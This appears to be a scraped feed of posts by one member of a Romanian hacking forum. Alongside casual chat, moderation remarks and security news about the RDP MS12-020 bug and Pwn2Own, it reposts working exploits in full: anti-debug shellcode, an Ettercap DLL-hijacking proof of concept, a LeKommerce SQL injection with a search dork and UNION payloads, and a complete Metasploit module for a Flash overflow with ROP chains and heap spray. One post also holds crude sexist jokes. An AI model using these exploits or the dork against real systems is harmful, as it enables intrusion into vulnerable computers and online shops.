Nytro

Nu va construiti vise in functie de promisiuni de mariri, realitatea e ceva mai dura.

"si nu stiti ce mortii mamicutelor voastre inseamna un SVN, si google code" Ce cuvinte ai ales ca sa te dai destept...

Microsoft: Remote Desktop Protocol Vulnerability Should be Patched Immediately By Brian Prince on March 13, 2012 Microsoft is urging organizations to apply the sole critical update in this month’s Patch Tuesday release as soon as possible. The critical bulletin – one of six security bulletins issued as part of today’s release – addresses two vulnerabilities in the Remote Desktop Protocol (RDP). “A little about MS12-020…this bulletin addresses one Critical-class issue and one Moderate-class issue in Remote Desktop Protocol (RDP),” Angela Gunn, security response communications manager for Microsoft’s Trustworthy Computing Group, explained in a blog post. “Both issues were cooperatively disclosed to Microsoft and we know of no active exploitation in the wild. The Critical-class issue applies to a fairly specific subset of systems – those running RDP – and is less problematic for those systems with Network Level Authentication (NLA) enabled.” “That said, we strongly recommend that customers examine and prepare to apply this bulletin as soon as possible,” she added. “The Critical-class issue could allow a would-be attacker to achieve remote code execution on a machine running RDP (a non-default configuration); if the machine does not have NLA enabled, the attacker would not require authentication for RCE access.” Ben Greenbaum, senior principle software engineer for Symantec’s Security Intelligence Group, agreed users should pay close attention to the RDP vulnerability. “RDP’s purpose is to enable remote access from the Internet, but preferably to an authenticated user,” he said. “In this case, a malicious attacker can potentially take complete control of the computer. Failed exploit attempts of this issue will likely result in the user being confronted with the blue screen of death. If an attacker can bypass standard memory protection measures, however, they will have access at the kernel level.” Those IT admins who use RDP to manage their machines over the internet, which is essentially the default in cloud-based installations such as Amazon’s AWS, need to patch as quickly as possible, Qualys CTOWolfgang Kandek opined. “If the patch cannot be applied that quickly or the necessary reboot cannot be scheduled, IT Admins should look into the available work-arounds that function immediately: protect the machine with restrictive firewalling, access RDP through a VPN service or switch to Microsoft’s NLA protocol that is supported in newer versions of Windows (Vista+) and is not vulnerable to the attack,” he said. Besides the RDP bugs, this month’s Patch Tuesday addressed five other vulnerabilities: two denial-of-service bugs and an escalation of privileges issue in Microsoft Windows; a remote code execution vulnerability in Microsoft Expression Design; and an escalation of privileges issue in Microsoft Visual Studio. All those issues are rated ‘important’ with the exception of one of the Windows’ denial-of-service bugs, which is rated ‘moderate.’ Also today, Adobe updated its ColdFusion software to address a vulnerability in versions 9.0.1 and earlier for Windows, Macintosh and UNIX systems that could lead to a denial-of-service attack using a hash algorithm collision. The company said it was unaware of any attempts to exploit the vulnerability in the wild. Sursa: Microsoft: Remote Desktop Protocol Vulnerability Should be Patched Immediately | SecurityWeek.Com Via: Microsoft: RDP Vulnerability Should Be Patched Immediately - Slashdot

[h=1]win xp sp2 PEB ISbeingdebugged shellcode[/h] #name: win xp sp2 PEB ISbeingdebugged shellcode #Author: ********* #Contact: teo.manojlovic@skole.hr #Date: 14.12.2009. here is the ASM code made using masm32 if program is being run under debugger the shellcode wil start beeping //////////////////////begin/////////////////////////////////////// .386 .model flat, stdcall option casemap :none INCLUDE C:\MASM32\INCLUDE\WINDOWS.INC INCLUDE C:\MASM32\INCLUDE\KERNEL32.INC INCLUDE C:\MASM32\INCLUDE\USER32.INC INCLUDE C:\MASM32\INCLUDE\MASM32.INC INCLUDELIB C:\MASM32\LIB\KERNEL32.LIB INCLUDELIB C:\MASM32\LIB\USER32.LIB INCLUDELIB C:\MASM32\LIB\MASM32.LIB .data ExitMsg DB "Enter to Exit", 0 .code start: assume fs:nothing mov eax,fs:[30h] mov eax, [eax+02h] mov ebx, 7FFF8000h add ebx,7FFF8000h inc ebx push 300h push 200h mov edx,7c837a8fh cmp eax,ebx jnz exit call edx exit: invoke ExitProcess,NULL end start /////////////////////////////end/////////////////////////////// here is the dump of code using olly debugger 00401000 >/$ 64:A1 30000000 MOV EAX,DWORD PTR FS:[30] 00401006 |. 8B40 02 MOV EAX,DWORD PTR DS:[EAX+2] 00401009 |. BB 0080FF7F MOV EBX,7FFF8000 0040100E |. 81C3 0080FF7F ADD EBX,7FFF8000 00401014 |. 43 INC EBX 00401015 |. 68 00030000 PUSH 300 ; /Duration = 768. ms 0040101A |. 68 00020000 PUSH 200 ; |Frequency = 200 (512.) 0040101F |. BA 8F7A837C MOV EDX,kernel32.Beep ; | 00401024 |. 3BC3 CMP EAX,EBX ; | 00401026 |. 75 02 JNZ SHORT antidebu.0040102A ; | 00401028 |. FFD2 CALL EDX ; \Beep 0040102A |> 6A 00 PUSH 0 ; /ExitCode = 0 0040102C \. E8 01000000 CALL <JMP.&kernel32.ExitProcess> ; \ExitProcess 00401031 CC INT3 00401032 .-FF25 00204000 JMP DWORD PTR DS:[<&kernel32.ExitProcess>; kernel32.ExitProcess here is the shellcode \x64\xA1\x30\x00\x00\x00\x8B\x40\x02\xBB\x00\x80\xFF\x7F\x81\xC3\x00\x80\xFF\x7F\x43\x68\x00\x03\x00\x00\x68\x00\x02\x00\x00\xBA\x8F\x7A\x83\x7C\x3B\xC3\x75\x02\xFF\xD2\x6A\x00\xE8\x01\x00\x00\x00\xCC\xFF\x25\x00\x20\x40\x00 Sursa: win xp sp2 PEB ISbeingdebugged shellcode Anti-debugging eficient...

Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll) /* Exploit Title: Ettercap NG-0.7.3 DLL hijacking (wpcap.dll) Date: 25/08/2010 Author: ********* Tested on: Windows XP SP3 Vulnerable extensions: .pcap Compile and rename to wpcap.dll, create a file in the same dir .pcap extension and visit http://chaossecurity.wordpress.com/ */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void pcap_findalldevs() { evil(); } DLLIMPORT void pcap_close() { evil(); } DLLIMPORT void pcap_compile() { evil(); } DLLIMPORT void pcap_datalink() { evil(); } DLLIMPORT void pcap_datalink_val_to_description() { evil(); } DLLIMPORT void pcap_dump() { evil(); } DLLIMPORT void pcap_dump_close() { evil(); } DLLIMPORT void pcap_dump_open() { evil(); } DLLIMPORT void pcap_file() { evil(); } DLLIMPORT void pcap_freecode() { evil(); } DLLIMPORT void pcap_geterr() { evil(); } DLLIMPORT void pcap_getevent() { evil(); } DLLIMPORT void pcap_lib_version() { evil(); } DLLIMPORT void pcap_lookupdev() { evil(); } DLLIMPORT void pcap_lookupnet() { evil(); } DLLIMPORT void pcap_loop() { evil(); } DLLIMPORT void pcap_open_live() { evil(); } DLLIMPORT void pcap_open_offline() { evil(); } DLLIMPORT void pcap_setfilter() { evil(); } DLLIMPORT void pcap_snapshot() { evil(); } DLLIMPORT void pcap_stats() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; } Sursa: Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll) Am postat doar ca sa reamintesc acest "truc"...

Pff, nu stiu cum se cheama maneaua

Daca e vorba de o retea locala, Microsoft face toti banii aici... - Communicator (Lync mai nou) permite conferinte - Outlook permite sa stabilesti meeting-uri - Share-ingul e simplu si eficient ............................... Asta daca nu te referi la managementul codului sursa, acolo e alta poveste.

int main(int argc, char* argv[]) { // In argc ai numarul de parametri (+1, fisierul care se executa e argv[0]) // In argv[1]... Ai fiecare parametru // Parcurgi cu un for si vezi daca un parametru e "-name", si daca e, urmatorul parametru, daca exista, o sa fie acel fisier }

Cum am spus, probabil un moderator/administrator a luat aceasta decizie, si sincer, nu stiu cine deocamdata. Problema e ca nu ne bagam peste deciziile altei persoane din staff (pe cat posibil), discutam intre noi apoi ajungem la o concluzie. Ar fi cam aiurea ca cineva sa dea ban si altcineva sa il scoata... Cand o sa aflu despre ce e vorba, probabil vei primi contul inapoi, ai rabdare o zi, doua.

Mersi, ban permanent.

Sunt la munca si nu am putut sa ma uit peste el sa ma dau cu parerea, nu te mai purta copilareste, ca o "attention whore". Codul e frumos organizat, dar nu am timp sa il citesc sa vad exact despre ce e vorba, o sa ma uit diseara.

Daca nu il cheama "Nytro" tot degeaba.

Hackeri: http://2.bp.blogspot.com/-COoyZ5u_me8/T124fMkzWZI/AAAAAAAAFMw/WjjETqyp-fo/s640/Finally+Google+Chrome+gets+hacked+at+Pwn2Own.jpg Vupen Security and Sergey Glazunov independently managed to penetrate Google Chrome’s security defenses at the Pwn2Own and 'Pwnium' contests respectively. The annual competition, which invites ethical hackers from around the world to attempt hacking into the most popular web browsers and in the process expose vulnerabilities and loopholes in the browser's security, while grabbing a handsome reward. At this year's competition, the co-founder and head of research of Vupen, Chaouki Bekrar and his team managed to break into Google Chrome in less than 5 minutes, in the process quashing talks about the browser's unquestionable security. They used "a pair of zero-day vulnerabilities to take complete control of a fully patched 64-bit Windows 7 (SP1) machine." For the successful break-in, Vupen has won itself 32 points. Google Chrome security knew that the Flash Player plugin sandbox is significantly weaker and that an exploit against Chrome’s Flash Player would have to go through a certain path.Having figured out that Vupen used that technique (from the May video), Google decided to add a specific protection for Flash. The hack qualifies him for one of the top $60,000 prizes that are part of Google’s $1 million Pwnium challenge, and could be the launch of a new security career. VUPEN co-founder Chaouki Bekrar, an outspoken exploit writer who insisted the team deliberately targeted Chrome to prove a point, was uncharacteristically coy when asked if the faulty Chrome code came from Adobe.”It was a use-after-free vulnerability in the default installation of Chrome,” he said. “Our exploit worked against the default installation so it really doesn’t matter if it’s third-party code anyway.” Bekrar told, Zdnet reports. IE 9 on Windows 7 was also hacked, again through a complicated hack that had to circumvent the browser’s sandbox. Microsoft, however, may not respond so rapidly, as its quality testing procedure usually takes a few months to fix bugs like these.Safari on Mac OS X Snow Leopard, along with Firefox and IE 8 on Windows XP, was also hacked. Sursa: Finally Google Chrome gets hacked at Pwn2Own | The Hacker News (THN)

Mi-am cumparat azi "Biblia barbatului" si pot sa spun ca e geniala: - "Bea o bere in timp ce te pisi pentru a exemplifica expresia 'a intrat a si iesit'" - "Vinul potrivit pentru orice masa este, in mod surprinzator, berea" - "Nu te baga intr-o bataie intr-un bar de la tara daca nu ai castigat macar un concurs de lupte in viata ta" - "Daca o fata nu isi da jos sutienul in timpul unui masaj, e clar ca nu vei primi nimic. Renunta si deschide o cutie de bere" - "Dupa ce o tipa cu aparat dentar te-a satisfacut oral spune-i ca ti-a placut sa te dai pe sine si de acum inainte numeste-o CFR" - "Cand o tipa spune ca nu face oral, cuprinde-o tandru in brate si spune-i ca este ok, nu e nicio problema... altele fac" - "Un barbat nu poate descrie sub nicio forma o femeie grasa folosind fraza 'Are o fata draguta'" Si multe altele. E vorba despre "barbatii" din ziua de azi, ca devin din ce in ce mai femei, si incearca sa defineasca prin 900+ reguli, cum arata un barbat adevarat.

Design: ISR copiat. Categorii: RST copiat. Noutati: ((void *)0)

Trebuie sa existe o colaborare intre syadmin si programator, ca sysadmin nu poti bloca de exemplu "<script>" pentru ca poate ai gazduit un forum ca RST si vei bloca jumatate dintre posturi. Ca sysadmin, nu poti sa pui reguli pentru a evita SQL Injection, cum ar fi "UNION" pentru ca pot fi mesaje care sa contina acest cuvant perfect valide, care sa nu aiba nici cea mai mica legatura cu SQLI. Nu poti nici macar sa blochezi doua request-uri in mai putin de o secunda pentru ca se intampla ca aici, deschizi doua tab-uri si unul dintre ele e blocat si risti sa pierzi clienti. Programatorii vin cu tot felul de pretentii ca sa mearga scripturile lor, ceea ce e si normal, insa e problema lor sa se ocupe de securitatea APLICATIILOR WEB nu a sysadminilor. Ca folosesc scripturi 3rd party, de asemenea, e problema lor. Nu e vina sysadminului ca aplicatia are SQL Injection. Si oricum am spune, administratorii tot petrec mult timp sa verifice loguri, sa vada unde pot sa apara probleme in aplicatie si sa incerce sa le rezolve de pe partea de administrare, ceea ce repet, nu e ok, pentru ca ulterior pot sa apara probleme. Sysadmin: "Ba, esti tampit, ai SQL Injection in aplicatie, uite aici cateva loguri, uite ca unii au dat cu Acunetix si altii cu Havij, asta e parametru vulerabil, repara problema, doar nu o sa stau eu sa dau DROP la pachete pe baza de sute de vectori ce pot fi folositi pentru ca tu nu faci o filtrare pe parametrii aplicatiei".

Benny, du-te si vorbeste cu un sysadmin si discutam apoi.

Buffer Overflow Vulnerability in GOM Media Player v. 2.1.37 Gobejishvili (longrifle0x) from The Vulnerability Laboratory Research Team discover Buffer Overflow Vulnerability in GOM Media Player v. 2.1.37. GOM Player (Gretech Online Movie Player) is a 32/64-bit media player for Microsoft Windows, distributed by the Gretech Corporation of South Korea. A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common type of security attack on data integrity. In this case, The vulnerability can be exploited by local or remote attackers and Vulnerable module is GomU+0x125cb7. Proof of Concept: 1) Download & open the software client 2) Click open ==> Url.. 3) Put vulnerability code 4) now you will see result http://www.youtube.com/watch?v=uN87KAm53Zg&feature=player_embedded In buffer overflow attacks, the extra data may contain codes designed to trigger actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information. Sursa: [POC] Buffer Overflow Vulnerability in GOM Media Player v. 2.1.37 | The Hacker News (THN)

Deci nu a fost nicio teapa.

printf() tricks Prin'() tricks Agenda • ShiMing the stack pointer & arbitrary mem writes… • … in order to exploit format string bugs without %n • When is a NULL pointer not just a NULL pointer? • …don’t expect prin'() & family to crash on NULL pointers • These are just a few things I played with a while back Download: http://cdn03.exploit-db.com/wp-content/themes/exploit/docs/18577.pdf

[h=1]SQLI Online Shop LeKommerce[/h] # Author: Mazt0r # Exploit Title: Online Shop SQLI LeKommerce # Date: 04 MARCH 2012 # software: LeKommerce # link: http://www.lekommerce.com/ # Version: "All version's" # Category: Commerce online # Tested on: Linux D0rk: inurl:secc.php?id= ===================================== Exploit : ====================== http://localhost/path/secc.php?id={sqli} ====================== Example: ====================== http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7-- http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7+from+information_schema.tables-- ====================== dbs: ====================== +--------------------------------+ | t_clientes | | t_colores | | t_colores_idiomas | | t_configuracionglobal | | t_emailing | | t_emailingcliente | | t_facturascompra | | t_facturasventa | | t_familias | | t_familias_idiomas | | t_formaspago | | t_idiomas | | t_incidencias | | t_iva | | t_marcas | | t_menusuperior | | t_noticias | | t_productos | | t_productos_idiomas | | t_proveedores | | t_provincias | | t_rel_productos_tallas_colores | | t_rel_tallas_colores | | t_seccionesproductos | | t_seccionesproductos_idiomas | | t_series | | t_subfamilias | | t_subfamilias_idiomas | | t_tallas | | t_tallas_idiomas | | t_tiposperfiles | | t_traducciones | | t_usuarios | +--------------------------------+ PASSWD: TEXT PLAIN? <<<--- SECURE? EPIC! --------------Gr33tZ------------------ DDLR - CYBERLOCOS - Thelatin - K4rl -Cpum4 - N350k - hkm - nitr0us - Xianur0 - All Firends! ---------------------------------- Blog: maztor.blogspot.com Twitter: @Mazt0r ---------------------------------- Sursa: SQLI Online Shop LeKommerce

[h=1]Adobe Flash Player .mp4 'cprt' Overflow"[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Adobe Flash Player MP4 'cprt' Overflow", 'Description' => %q{ This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt .mp4 file loaded by Flash, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the "Iran's Oil and Nuclear Situation.doc" e-mail attack. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Gavrun', # Vulnerability discovery 'sinn3r', # Metasploit module 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2012-0754' ], [ 'OSVDB', '79300'], [ 'BID', '52034' ], [ 'URL', 'http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html' ], [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-03.html' ] ], 'Payload' => { 'StackAdjustment' => -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # Flash Player 11.1.102.55 # Flash Player 10.3.183.10 [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x800 - code.length', 'Ret' => 0x0c0c0c0c } ], [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x800 - code.length', 'Ret' => 0x0c0c0c0c } ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Ret' => 0x77c15ed5 } ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x77c15ed5 } ], [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x600', 'Ret' => 0x0c0c0c0c } ] ], 'Privileged' => false, 'DisclosureDate' => "Feb 15 2012", 'DefaultTarget' => 0)) end def junk(n=4) return rand_text_alpha(n).unpack("V").first end def nop return make_nops(4).unpack("V").first end def get_payload(t) if t['Rop'].nil? code = "" else code = "\xbc\x0c\x0c\x0c\x0c" #Fix the stack to avoid a busted encoder end code << payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt rop = [ 0x77c4e392, # POP EAX # RETN 0x77c11120, # <- *&VirtualProtect() 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN junk, 0x77c2dd6c, 0x77c4ec00, # POP EBP # RETN 0x77c35459, # ptr to 'push esp # ret' 0x77c47705, # POP EBX # RETN 0x00000800, # <- change size to mark as executable if needed (-> ebx) 0x77c3ea01, # POP ECX # RETN 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) 0x77c46100, # POP EDI # RETN 0x77c46101, # ROP NOP (-> edi) 0x77c4d680, # POP EDX # RETN 0x00000040, # newProtect (0x40) (-> edx) 0x77c4e392, # POP EAX # RETN nop, # NOPS (-> eax) 0x77c12df9, # PUSHAD # RETN ].pack("V*") when :jre rop = [ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) 0x7c347f98, # RETN (ROP NOP) 0x7c3415a2, # JMP [EAX] 0xffffffff, 0x7c376402, # skip 4 bytes 0x7c351e05, # NEG EAX # RETN 0x7c345255, # INC EBX # FPATAN # RETN 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN 0x7c344f87, # POP EDX # RETN 0xffffffc0, # Value to negate, will become 0x00000040 0x7c351eb1, # NEG EDX # RETN 0x7c34d201, # POP ECX # RETN 0x7c38b001, # &Writable location 0x7c347f97, # POP EAX # RETN 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN 0x7c345c30, # ptr to 'push esp # ret ' ].pack("V*") end pivot = [0x77C1CAFB].pack('V*') #POP/POP/RET pivot << [junk].pack('V*') pivot << [t.ret].pack('V*') code = pivot + rop + code return code end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ return targets[1] #IE 6 on Windows XP SP3 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ return targets[2] #IE 7 on Windows XP SP3 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/ return targets[3] #IE 8 on Windows XP SP3 elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/ return targets[5] #IE 7 on Windows Vista else return nil end end def on_request_uri(cli, request) agent = request.headers['User-Agent'] my_target = get_target(agent) # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("#{cli.peerhost}:#{cli.peerport} Browser not supported, will not launch attack: #{agent.to_s}") send_not_found(cli) return end print_status("#{cli.peerhost}:#{cli.peerport} Client requesting: #{request.uri}") # The SWF requests our MP4 trigger if request.uri =~ /\.mp4$/ print_status("#{cli.peerhost}:#{cli.peerport} Sending MP4...") mp4 = create_mp4(my_target) send_response(cli, mp4, {'Content-Type'=>'video/mp4'}) return end if request.uri =~ /\.swf$/ print_status("#{cli.peerhost}:#{cli.peerport} Sending Exploit SWF...") send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' }) return end p = get_payload(my_target) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch)) js_pivot = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); heap_obj.debug(true); for (var i=1; i < 0x1C2; i++) { heap_obj.alloc(block); } heap_obj.debug(true); JS js_pivot = heaplib(js_pivot, {:noobfu => true}) swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource swf_uri << "/Exploit.swf" print_status("#{cli.peerhost}:#{cli.peerport} #{swf_uri}") html = %Q| <html> <head> <script> #{js_pivot} </script> </head> <body> <center> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="test" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"> <param name="movie" value="#{swf_uri}" /> <embed src="#{swf_uri}" quality="high" width="1" height="1" name="test" align="middle" allowNetworking="all" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"> </embed> </object> </center> </body> </html> | html = html.gsub(/^\t\t/, '') # # "/test.mp4" is currently hard-coded in the swf file, so we need to add to resource # proc = Proc.new do |cli, req| on_request_uri(cli, req) end add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil print_status("#{cli.peerhost}:#{cli.peerport} Sending html...") send_response(cli, html, {'Content-Type'=>'text/html'}) end def cleanup remove_resource('/test.mp4') rescue nil super end def exploit @swf = create_swf super end def create_swf path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0754.swf" ) fd = ::File.open( path, "rb" ) swf = fd.read(fd.stat.size) fd.close return swf end def create_mp4(target) mp4 = "" mp4 << "\x00\x00\x00\x18" mp4 << "ftypmp42" mp4 << "\x00\x00\x00\x00" mp4 << "mp42isom" mp4 << "\x00\x00\x00\x0D" mp4 << "cprt" mp4 << "\x00\xFF\xFF\xFF" mp4 << "\x00\x00\x00\x00" mp4 << "\x0c\x0c\x0c\x0c" * 2586 return mp4 end end =begin C:\WINDOWS\system32\Macromed\Flash\Flash11e.ocx C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx (510.9b4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0c0c0c0c ebx=03e46810 ecx=0396b160 edx=00000004 esi=03e46cd4 edi=00000000 eip=10048b65 esp=0428fd10 ebp=0428feb4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx - Flash10x+0x48b65: 10048b65 ff5008 call dword ptr [eax+8] ds:0023:0c0c0c14=???????? =end Sursa: Adobe Flash Player .mp4 'cprt' Overflow"

[h=2]Pinkie Pie Earns $60K At Pwn2Own With Three Chromium 0-Day Exploits[/h]Tackhead writes "Hot on the hooves of Sergey Glazunov's hack 5-minutes into Pwn2Own, an image of an axe-wielding pink pony was the mark of success for a hacker with the handle of Pinkie Pie. Pinkie Pie subtly tweaked Chromium's sandbox design by chaining together three zero-day vulnerabilities, thereby widening his appeal to $60K in prize money, another shot at a job opportunity at the Googleplex, and instantly making Google's $1M Pwnium contest about 20% cooler. (Let the record show that Slashdot was six years ahead of this particular curve, and that April Fool's Day is less than a month away.)" Vedeti: Teen Exploits Three Zero-Day Vulns for $60K Win in Google Chrome Hack Contest | Threat Level | Wired.com Sursa: Pinkie Pie Earns $60K At Pwn2Own With Three Chromium 0-Day Exploits - Slashdot

Daca sunt sysadmin, nu e problema mea sa pun filtre pentru "SeLeCt" sau "<script>" pentru ca nu e problema mea ca programatorul nu poate filtra asta. Da, un sysadmin bun is bate capul si isi pierde timpul cu asa ceva, dar nu este problema lui. Intr-adevar, sunt multe scripturi publice vulnerabile, dar tot nu vad ce legatura ar putea avea sysadmin-ul. Asta tine de Project Manager si de cati bani baga in proiect, daca nu baga, folosesc un script public si "bum", problema lor. Sysadminul trebuie sa fie atent la problemele lui, configurarea serverului: php.ini, permisiuni fisiere, sub ce utilizatori ruleaza procesele si tot asa. Dar de multe ori vin programatori cu request-uri ca "Vreau 9999 time limit", vreau "9999 max_file_upload" sau mai stiu eu ce, fara un motiv serios si de aici apar problemele. Din moment ce vulnerabila e aplicatia web, programatorul e de vina.

Nu ai fost luat peste picior, am inteles ideile, unele dau de gandit, altele nu sunt chiar atat de practice. Nu putem sterge conturile banate definitiv, pe baza lor putem stii daca membri actuali sunt printre noi (de exemplu cei care se ocupa cu carding, CC-uri... si care nu ne plac). Iar conturile vechi nu incurca pe nimeni, apar mereu persoane care nu mai activeaza de mult timp, sunt admini care nu mai activeaza de mult ci doar din cand in cand, stergerea acelor conturi ar fi penibila, nu putem forta pe cineva sa isi faca un alt cont pentru ca nu a intrat de mult timp. Cat despre curatenia forumului de posturi si topicuri inutile, se incearca tot ce se poate, in limita timpului disponibil. In fiecare zi se baneaza useri sau se muta topicuri la "Cosul de gunoi".